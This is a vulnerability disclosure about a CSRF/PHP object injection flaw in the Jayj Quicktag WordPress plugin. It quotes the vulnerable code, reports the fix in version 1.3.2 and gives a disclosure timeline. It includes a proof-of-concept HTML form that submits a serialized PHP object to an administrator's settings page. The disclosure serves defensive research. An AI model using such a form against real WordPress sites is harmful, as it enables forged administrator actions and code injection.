28 Aug

Cross-Site Request Forgery (CSRF)/PHP Object Injection Vulnerability in Jayj Quicktag

We recently found that the plugin Jayj Quicktag contained a cross-site request forgery (CSRF)/PHP object injection vulnerability.

The plugin’s settings page is generated with the function jayj_quicktag_options_page() in the file /jayj-quicktag.php. In that file if the POST input “jayj-quicktag-import-save” exists then the maybe_unserialize() function will be run on the POST input “jayj-quicktag-import”, which permits PHP object injection to occur:

70
71
72
73
if ( isset( $_POST['jayj-quicktag-import-save'] ) ) :
 
	$options = get_option( 'jayj_qt_settings' );
	$data = maybe_unserialize( stripslashes_deep( $_POST['jayj-quicktag-import'] ) );

Access to the settings page is limited to users with the “manage_options” capability, which would normally only be Administrator-level users and therefore this would not be a vulnerability on its own since they would normally be able to do anything that could be accomplished through PHP object injection. Because there was not protection against cross-site request forgery (CSRF) an attacker could cause an administrator to cause PHP object injection without them intending it, which would be a vulnerability.

After we notified the developer, they released version 1.3.2, which fixes the vulnerability by replacing serialization/unserialization with JSON encoding/decoding and by using a nonce to prevent CSRF.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” to be shown, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=jayj-quicktag%2Fjayj-quicktag.php" method="POST">
<input type="hidden" name="jayj-quicktag-import-save" value="" />
<input type="hidden" name="jayj-quicktag-import" value='O:20:"php_object_injection":0:{}' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • August 25, 2017 – Developer notified.
  • August 27, 2017 – Developer responds.
  • August 28, 2017 – Version 1.3.2 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *